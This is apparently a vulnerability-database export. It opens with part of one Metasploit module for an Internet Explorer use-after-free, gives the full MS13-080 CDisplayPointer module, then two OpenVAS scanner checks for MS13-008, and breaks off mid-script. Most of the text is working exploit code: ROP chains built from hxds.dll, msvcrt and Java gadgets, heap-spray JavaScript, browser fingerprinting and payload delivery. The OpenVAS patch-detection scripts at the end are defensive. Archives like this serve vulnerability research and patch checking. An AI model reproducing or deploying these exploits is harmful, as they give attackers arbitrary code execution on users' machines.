Alignment \n0x51c46f91, # POP EBP # RETN [hxds.dll] \n0x51c46f91, # skip 4 bytes [hxds.dll] \n0x51c35a4d, # POP EBX # RETN [hxds.dll] \n0xffffffff, \n0x51bd90fd, # INC EBX # RETN [hxds.dll] \n0x51bd90fd, # INC EBX # RETN [hxds.dll] \n0x51bfa98e, # POP EDX # RETN [hxds.dll] \n0xffffefff, \n0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll] \n0x51c1df88, # NEG EAX # RETN [hxds.dll] \n0x51c55c45, # DEC EAX, RETN [hxds.dll] \n0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll] \n0x51c4c17c, # POP ECX # RETN [hxds.dll] \n0xffffffc0, \n0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll] \n0x51c1df88, # NEG EAX # RETN [hxds.dll] \n0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll] \n0x51c05766, # POP EDI # RETN [hxds.dll] \n0x51bfbaaf, # RETN (ROP NOP) [hxds.dll] \n0x51c2e77d, # POP ESI # RETN [hxds.dll] \n0x51bfc840, # JMP [EAX] [hxds.dll] \n0x51c05266, # POP EAX # RETN [hxds.dll] \n0x51bd115c, # ptr to &VirtualAlloc() [IAT hxds.dll] \n0x51bdf91f, # PUSHAD # RETN [hxds.dll] \n0x51c4a9f3, # ptr to 'jmp esp' [hxds.dll] \n].pack(\"V*\") \n \nwhen :office2010 \nrop = \n[ \n# 4 dword junks due to the add esp in stack pivot \njunk, \njunk, \njunk, \njunk, \n0x51c41953, # POP EBP # RETN [hxds.dll] \n0x51be3a03, # RETN (ROP NOP) [hxds.dll] \n0x51c41953, # skip 4 bytes [hxds.dll] \n0x51c4486d, # POP EBX # RETN [hxds.dll] \n0xffffffff, \n0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll] \n0x51bd1a77, # INC EAX # RETN [hxds.dll] \n0x51bd1a77, # INC EAX # RETN [hxds.dll] \n0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll] \n0x51bfa298, # POP EDX # RETN [hxds.dll] \n0xffffefff, \n0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll] \n0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll] \njunk, \n0x51bd5382, # DEC EAX # RETN [hxds.dll] \n0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll] \n0x51c1f094, # POP ECX # RETN [hxds.dll] \n0xffffffc0, \n0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll] \n0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll] \njunk, \n0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll] \n0x51bf1ff0, # POP EDI # RETN [hxds.dll] \n0x51bd5383, # RETN (ROP NOP) [hxds.dll] \n0x51c07c8b, # POP ESI # RETN [hxds.dll] \n0x51bfc7cb, # JMP [EAX] [hxds.dll] \n0x51c44707, # POP EAX # RETN [hxds.dll] \n0x51bd10bc, # ptr to &VirtualAlloc() [IAT hxds.dll] \n0x51c3604e, # PUSHAD # RETN [hxds.dll] \n0x51c541ef, # ptr to 'jmp esp' [hxds.dll] \n].pack(\"V*\") \nend \n \np = rop + code \np \nend \n \ndef get_exploit_html(cli, req, rop_dll) \ngadgets = {} \ncase rop_dll \nwhen :office2007 \ngadgets[:spray1] = 0x1af40020 \n \n# 0x31610020-0xc4, pointer to gadgets[:call_eax] \ngadgets[:target] = 0x3160ff5c \n \n# mov eax, [esi] \n# push esi \n# call [eax+4] \ngadgets[:call_eax] = 0x51bd1ce8 \n \n# xchg eax,esp \n# add byte [eax], al \n# pop esi \n# mov [edi+23c], ebp \n# mov [edi+238], ebp \n# mov [edi+234], ebp \n# pop ebp \n# pop ebx \n# ret \ngadgets[:pivot] = 0x51be4418 \n \nwhen :office2010 \ngadgets[:spray1] = 0x1a7f0020 \n \n# 0x30200020-0xc4, pointer to gadgets[:call_eax] \ngadgets[:target] = 0x301fff5c \n \n# mov eax, [esi] \n# push esi \n# call [eax+4] \ngadgets[:call_eax] = 0x51bd1a41 \n \n# xchg eax,esp \n# add eax,dword ptr [eax] \n# add esp,10 \n# mov eax,esi \n# pop esi \n# pop ebp # retn 4 \ngadgets[:pivot] = 0x51c00e64 \nend \n \np1 = \n[ \ngadgets[:target], # Target address \ngadgets[:pivot] # stack pivot \n].pack(\"V*\") \n \np1 << get_payload(rop_dll) \n \np2 = \n[ \ngadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax) \n].pack(\"V*\") \n \njs_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack(\"V*\")) \njs_p1 = Rex::Text.to_unescape(p1) \njs_p2 = Rex::Text.to_unescape(p2) \n \n%Q| \n<html> \n<script> \n#{js_property_spray} \n \nfunction loadOffice() { \ntry{location.href='ms-help://'} catch(e){} \n} \n \nvar a = new Array(); \nfunction spray() { \nvar obj = ''; \nfor (i=0; i<20; i++) { \nif (i==0) { obj += unescape(\"#{js_s1}\"); } \nelse { obj += \"\\\\u4242\\\\u4242\"; } \n} \nobj += \"\\\\u5555\"; \n \nfor (i=0; i<10; i++) { \nvar e = document.createElement(\"div\"); \ne.className = obj; \na.push(e); \n} \n \nvar s1 = unescape(\"#{js_p1}\"); \nsprayHeap({shellcode:s1, maxAllocs:0x300}); \nvar s2 = unescape(\"#{js_p2}\"); \nsprayHeap({shellcode:s2, maxAllocs:0x300}); \n} \n \nfunction hit() \n{ \nvar id_0 = document.createElement(\"sup\"); \nvar id_1 = document.createElement(\"audio\"); \n \ndocument.body.appendChild(id_0); \ndocument.body.appendChild(id_1); \nid_1.applyElement(id_0); \n \nid_0.onlosecapture=function(e) { \ndocument.write(\"\"); \nspray(); \n} \n \nid_0['outerText']=\"\"; \nid_0.setCapture(); \nid_1.setCapture(); \n} \n \nfor (i=0; i<20; i++) { \ndocument.createElement(\"frame\"); \n} \n \nwindow.onload = function() { \nloadOffice(); \nhit(); \n} \n</script> \n</html> \n| \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nunless is_win7_ie9?(agent) \nprint_error(\"Not a suitable target: #{agent}\") \nsend_not_found(cli) \nend \n \nhtml = '' \nif request.uri =~ /\\?dll=(\\w+)$/ \nrop_dll = '' \nif $1 == 'office2007' \nprint_status(\"Using Office 2007 ROP chain\") \nrop_dll = :office2007 \nelsif $1 == 'office2010' \nprint_status(\"Using Office 2010 ROP chain\") \nrop_dll = :office2010 \nelse \nprint_error(\"Target does not have Office installed\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = get_exploit_html(cli, request, rop_dll) \nelse \nprint_status(\"Checking target requirements...\") \nhtml = get_preq_html(cli, request) \nend \n \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) \nend \n \ndef exploit \n@exploit_page = \"default.html\" \nsuper \nend \n \nend \n \n=begin \n \nhxds.dll (Microsoft\u00ae Help Data Services Module) \n \n2007 DLL info: \nProductVersion: 2.05.50727.198 \nFileVersion: 2.05.50727.198 (QFE.050727-1900) \n \n2010 DLL info: \nProductVersion: 2.05.50727.4039 \nFileVersion: 2.05.50727.4039 (QFE.050727-4000) \n \nmshtml.dll \nProductVersion: 9.00.8112.16446 \nFileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400) \nFileDescription: Microsoft (R) HTML Viewer \n \n \n0:005> r \neax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34 \neip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 \nMSHTML!CTreeNode::GetInterface+0xd8: \n679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=???????? \n \n \n66e13df7 8b0e mov ecx,dword ptr [esi] \n66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000) \n66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h] \n66e13e01 ffd0 call eax \n \n=end`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123457/ie_setmousecapture_uaf.rb.txt"}, {"lastseen": "2016-12-05T22:15:54", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-14T00:00:00", "published": "2013-10-14T00:00:00", "href": "https://packetstormsecurity.com/files/123603/MS13-080-Microsoft-Internet-Explorer-CDisplayPointer-Use-After-Free.html", "id": "PACKETSTORM:123603", "type": "packetstorm", "title": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \ninclude Msf::Exploit::Remote::BrowserAutopwn \n \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"8.0\", \n:ua_maxver => \"8.0\", \n:javascript => true, \n:os_name => OperatingSystems::WINDOWS, \n:rank => NormalRanking \n}) \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Microsoft Internet Explorer. It was originally \nfound being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, \naround the same time frame as CVE-2013-3893, except this was kept out of the public eye by \nmultiple research companies and the vendor until the October patch release. \n \nThis issue is a use-after-free vulnerability in CDisplayPointer via the use of a \n\"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft \nthe DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. \nIf we use a select() function for the CTextArea element, two important things will happen: \na CDisplayPointer object will be created for CTextArea, and it will also trigger another \nevent called \"onselect\". The \"onselect\" event will allow us to set up for the actual event \nhandler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child \nof CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger \n\"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer \nobject can be forced by using an \"Unslect\" (other approaches also apply), but a reference \nof this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after \nthe CDoc::GetLineInfo call, because it is still trying to use that to update \nCDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash \nfinally occurs due to accessing the freed memory. By controlling this freed memory, it is \npossible to achieve arbitrary code execution under the context of the user. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Exploit in the wild \n'sinn3r' # Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2013-3897' ], \n[ 'OSVDB', '98207' ], \n[ 'MSB', 'MS13-080' ], \n[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ], \n[ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ] \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3', {} ], \n[ 'IE 8 on Windows 7', {} ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x81\\xc4\\x0c\\xfe\\xff\\xff\" # add esp, -500 \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Privileged' => false, \n# Jsunpack first received a sample to analyze on Sep 12 2013. \n# MSFT patched this on Oct 8th. \n'DisclosureDate' => \"Oct 08 2013\", \n'DefaultTarget' => 0)) \nend \n \ndef get_check_html \n%Q|<html> \n<script> \n#{js_os_detect} \n \nfunction os() { \nvar detect = window.os_detect.getVersion(); \nvar os_string = detect.os_name + \" \" + detect.os_flavor + \" \" + detect.ua_name + \" \" + detect.ua_version; \nreturn os_string; \n} \n \nfunction dll() { \nvar checka = 0; \nvar checkb = 0; \ntry { \nchecka = new ActiveXObject(\"SharePoint.OpenDocuments.4\"); \n} catch (e) {} \n \ntry { \ncheckb = new ActiveXObject(\"SharePoint.OpenDocuments.3\"); \n} catch (e) {} \n \nif ((typeof checka) == \"object\" && (typeof checkb) == \"object\") { \ntry{location.href='ms-help://'} catch(e){} \nreturn \"#{@js_office_2010_str}\"; \n} \nelse if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") { \ntry{location.href='ms-help://'} catch(e){} \nreturn \"#{@js_office_2007_str}\"; \n} \nreturn \"#{@js_default_str}\"; \n} \n \nwindow.onload = function() { \nwindow.location = \"#{get_resource}/search?o=\" + escape(os()) + \"&d=\" + dll(); \n} \n</script> \n</html> \n| \nend \n \ndef junk \nrand_text_alpha(4).unpack(\"V\")[0].to_i \nend \n \ndef get_payload(target_info) \nrop_payload = '' \nos = target_info[:os] \ndll_used = '' \n \ncase target_info[:dll] \nwhen @js_office_2007_str \ndll_used = \"Office 2007\" \n \npivot = \n[ \n0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4 \njunk, # ESI due to POPAD \njunk, # EBP due to POPAD \njunk, \njunk, # EBX due to POPAD \njunk, # EDX due to POPAD \njunk, # ECX due to POPAD \n0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction) \n0x51bd81db, # ROP NOP \njunk # Padding for the retn 4 from the stack pivot \n].pack(\"V*\") \n \nrop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot}) \n \nwhen @js_office_2010_str \ndll_used = \"Office 2010\" \n \npivot = \n[ \n0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4 \njunk, \njunk, \njunk, \njunk, \njunk, \n0x51BE7E9A, # ROP NOP \njunk # Padding for the retn 4 from the stack pivot \n].pack(\"V*\") \n \nrop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot}) \n \nwhen @js_default_str \nif target_info[:os] =~ /windows xp/i \n# XP uses msvcrt.dll \ndll_used = \"msvcrt\" \n \npivot = \n[ \n0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret \n].pack(\"V*\") \n \nrop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot}) \nelse \n# Assuming this is Win 7, and we'll use Java 6 ROP \ndll_used = \"Java\" \n \npivot = \n[ \n0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn \njunk # Padding for the POP ECX \n].pack(\"V*\") \n \nrop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot}) \nend \nend \n \nprint_status(\"Target uses #{os} with #{dll_used} DLL\") \n \nrop_payload \nend \n \ndef get_sploit_html(target_info) \nos = target_info[:os] \njs_payload = '' \n \nif os =~ /Windows (7|XP) MSIE 8\\.0/ \njs_payload = Rex::Text.to_unescape(get_payload(target_info)) \nelse \nprint_error(\"Target not supported by this attack.\") \nreturn \"\" \nend \n \n%Q|<html> \n<head> \n<script> \n#{js_property_spray} \nsprayHeap({shellcode:unescape(\"#{js_payload}\")}); \n \nvar earth = document; \nvar data = \"\"; \nfor (i=0; i<17; i++) { \nif (i==7) { data += unescape(\"%u2020%u2030\"); } \nelse { data += \"\\\\u4141\\\\u4141\"; } \n} \ndata += \"\\\\u4141\"; \n \nfunction butterfly() { \nfor(i=0; i<20; i++) { \nvar effect = earth.createElement(\"div\"); \neffect.className = data; \n} \n} \n \nfunction kaiju() { \nvar godzilla = earth.createElement(\"textarea\"); \nvar minilla = earth.createElement(\"pre\"); \nearth.body.appendChild(godzilla); \nearth.body.appendChild(minilla); \ngodzilla.appendChild(minilla); \n \ngodzilla.onselect=function(e) { \nminilla.swapNode(earth.createElement(\"div\")); \n} \n \nvar battleStation = false; \nvar war = new Array(); \ngodzilla.onpropertychange=function(e) { \nif (battleStation == true) { \nfor (i=0; i<50; i++) { \nwar.push(earth.createElement(\"span\")); \n} \n} \n \nearth.execCommand(\"Unselect\"); \n \nif (battleStation == true) { \nfor (i=0; i < war.length; i++) { \nwar[i].className = data; \n} \n} \nelse { \nbattleStation = true; \n} \n} \n \nbutterfly(); \ngodzilla.select(); \n} \n</script> \n</head> \n<body onload='kaiju()'> \n</body> \n</html> \n| \nend \n \n \ndef on_request_uri(cli, request) \nif request.uri =~ /search\\?o=(.+)\\&d=(.+)$/ \ntarget_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) } \nsploit = get_sploit_html(target_info) \nsend_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) \nreturn \nend \n \nhtml = get_check_html \nprint_status(\"Checking out target...\") \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) \nend \n \ndef exploit \n@js_office_2007_str = Rex::Text.rand_text_alpha(4) \n@js_office_2010_str = Rex::Text.rand_text_alpha(5) \n@js_default_str = Rex::Text.rand_text_alpha(6) \nsuper \nend \n \nend \n \n \n=begin \n \n+hpa this for debugging or you might not see a crash at all :-) \n \n0:005> r \neax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c \neip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 \nmshtml!QIClassID+0x30: \n6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=???????? \n0:005> u \nmshtml!QIClassID+0x30: \n6d6dc123 8b03 mov eax,dword ptr [ebx] \n6d6dc125 8365e800 and dword ptr [ebp-18h],0 \n6d6dc129 8d4de8 lea ecx,[ebp-18h] \n6d6dc12c 51 push ecx \n6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170) \n6d6dc132 53 push ebx \n6d6dc133 bf02400080 mov edi,80004002h \n6d6dc138 ff10 call dword ptr [eax] \n \n=end \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123603/ms13_080_cdisplaypointer.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-01-08T14:02:39", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.", "modified": "2020-01-07T00:00:00", "published": "2013-01-02T00:00:00", "id": "OPENVAS:1361412562310902699", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902699", "title": "Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902699\");\n script_version(\"2020-01-07T08:11:35+0000\");\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 08:11:35 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-02 10:52:56 +0530 (Wed, 02 Jan 2013)\");\n script_name(\"Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1027930\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/154201\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/80885\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2794220\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/security/advisory/2794220\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-au/security/bulletin/ms13-008\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could will remote attackers to gain sensitive\n information or execute arbitrary code in the context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x\");\n\n script_tag(name:\"insight\", value:\"Flaw exists due to the way that Internet Explorer accesses an object that has\n been deleted or has not been properly allocated and causing use-after-free error when handling the CDwnBindInfo object.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || ieVer !~ \"^[6-8]\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6325\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5098\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18746\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22994\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17184\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21392\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18020\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22184\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:11:25", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.", "modified": "2017-05-10T00:00:00", "published": "2013-01-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902699", "id": "OPENVAS:902699", "title": "Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms_ie_remote_code_exec_vuln.nasl 6093 2017-05-10 09:03:18Z teissa $\n#\n# Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could will remote attackers to gain sensitive\n information or execute arbitrary code in the context of the current user.\n Impact Level: System/Application\";\n\ntag_affected = \"Microsoft Internet Explorer version 6.x/7.x/8.x\";\ntag_insight = \"Flaw exists due to the way that Internet Explorer accesses an object that has\n been deleted or has not been properly allocated and causing use-after-free\n error when handling the CDwnBindInfo object.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms13-008\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.\";\n\nif(description)\n{\n script_id(902699);\n script_version(\"$Revision: 6093 $\");\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-10 11:03:18 +0200 (Wed, 10 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-02 10:52:56 +0530 (Wed, 02 Jan 2013)\");\n script_name(\"Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/51695\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1027930\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/154201\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/80885\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2794220\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/advisory/2794220\");\n script_xref(name : \"URL\" , value : \"https://technet.microsoft.com/en-au/security/bulletin/ms13-008\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_keys(\"MS/IE/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\nieVer = \"\";\ndllVer = NULL;\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## Get IE Version from KB\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || !(ieVer =~ \"^(6|7|8)\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\n## Get Version from Mshtml.dll\ndllVer = fetch_file_version(sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6325\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, 